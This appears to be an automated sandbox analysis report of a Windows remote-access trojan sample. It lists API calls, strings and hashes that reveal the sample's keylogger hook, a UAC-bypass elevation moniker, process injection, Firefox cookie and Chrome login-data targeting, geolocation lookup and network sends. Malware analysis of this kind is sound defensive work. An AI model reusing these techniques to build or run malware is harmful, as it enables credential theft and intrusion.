                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                      • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                      • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                    • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                    Strings
                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                    • API String ID: 3756808967-1743721670
                                    • Opcode ID: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                    • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                    • Opcode Fuzzy Hash: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                    • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                    Strings
                                    • API ID:
                                    • String ID: 0$1$2$3$4$5$6$7$VG
                                    • API String ID: 0-1861860590
                                    • Opcode ID: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                    • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                    • Opcode Fuzzy Hash: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                    • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                    APIs
                                    • _wcslen.LIBCMT ref: 0040755C
                                    • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                    Strings
                                    • API ID: Object_wcslen
                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                    • API String ID: 240030777-3166923314
                                    • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                    • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                    • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                    • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                    • GetLastError.KERNEL32 ref: 0041A84C
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                    • String ID:
                                    • API String ID: 3587775597-0
                                    • Opcode ID: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                    • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                    • Opcode Fuzzy Hash: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                    • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                    • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                    • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                    Strings
                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                    • String ID: JD$JD$JD
                                    • API String ID: 745075371-3517165026
                                    • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                    • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                    • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                    • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                    • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                    • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                    Strings
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 1164774033-405221262
                                    • Opcode ID: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                    • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                    • Opcode Fuzzy Hash: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                    • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
                                      • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                    • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 2341273852-0
                                    • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                    • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                    • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                    • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                      • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$CreateFirstNext
                                    • String ID: 8SG$PXG$PXG$NG$PG
                                    • API String ID: 341183262-3812160132
                                    • Opcode ID: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                    • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                    • Opcode Fuzzy Hash: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                    • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                    • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                    • GetLastError.KERNEL32 ref: 0040A328
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                    • TranslateMessage.USER32(?), ref: 0040A385
                                    • DispatchMessageA.USER32(?), ref: 0040A390
                                    Strings
                                    • Keylogger initialization failure: error , xrefs: 0040A33C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                    • String ID: Keylogger initialization failure: error
                                    • API String ID: 3219506041-952744263
                                    • Opcode ID: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                    • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                    • Opcode Fuzzy Hash: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                    • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0040A451
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                    • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                    • GetKeyState.USER32(00000010), ref: 0040A46E
                                    • GetKeyboardState.USER32(?), ref: 0040A479
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                    • String ID:
                                    • API String ID: 1888522110-0
                                    • Opcode ID: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                    • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                    • Opcode Fuzzy Hash: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                    • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                    APIs
                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                    • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                    • API String ID: 2127411465-314212984
                                    • Opcode ID: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                    • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                    • Opcode Fuzzy Hash: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                    • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                    APIs
                                    • _free.LIBCMT ref: 00449292
                                    • _free.LIBCMT ref: 004492B6
                                    • _free.LIBCMT ref: 0044943D
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                    • _free.LIBCMT ref: 00449609
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                    • String ID:
                                    • API String ID: 314583886-0
                                    • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                    • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                    • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                    • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                    APIs
                                      • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                      • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                      • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                      • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                      • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                    • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                    • String ID: !D@$PowrProf.dll$SetSuspendState
                                    • API String ID: 1589313981-2876530381
                                    • Opcode ID: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                    • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                    • Opcode Fuzzy Hash: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                    • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                    APIs
                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                    Strings
                                    • http://geoplugin.net/json.gp, xrefs: 0041B448
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleOpen$FileRead
                                    • String ID: http://geoplugin.net/json.gp
                                    • API String ID: 3121278467-91888290
                                    • Opcode ID: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                    • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                    • Opcode Fuzzy Hash: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                    • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                    • GetLastError.KERNEL32 ref: 0040BA93
                                    Strings
                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                    • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                    • UserProfile, xrefs: 0040BA59
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    • API String ID: 2018770650-1062637481
                                    • Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                    • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                    • Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                    • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                    • GetLastError.KERNEL32 ref: 004179D8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3534403312-3733053543
                                    • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                    • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                    • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                    • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00409293
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                    • FindClose.KERNEL32(00000000), ref: 004093FC
                                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                      • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
                                    • FindClose.KERNEL32(00000000), ref: 004095F4
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                    • String ID:
                                    • API String ID: 1824512719-0
                                    • Opcode ID: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                    • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                    • Opcode Fuzzy Hash: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                    • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: FSE$FSE$PkGNG
                                    • API String ID: 0-1266307253
                                    • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                    • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                    • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                    • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID:
                                    • API String ID: 276877138-0
                                    • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                    • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                    • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                    • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                    APIs
                                      • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                      • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                      • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                    • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                    • ExitProcess.KERNEL32 ref: 0040F905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 5.1.3 Pro$override$pth_unenc
                                    • API String ID: 2281282204-1392497409
                                    • Opcode ID: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                    • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                    • Opcode Fuzzy Hash: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                    • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                    • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP
                                    • API String ID: 2299586839-711371036
                                    • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                    • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                    • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                    • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                    APIs
                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                    • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                    • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                    • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SETTINGS
                                    • API String ID: 3473537107-594951305
                                    • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                    • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                    • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                    • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
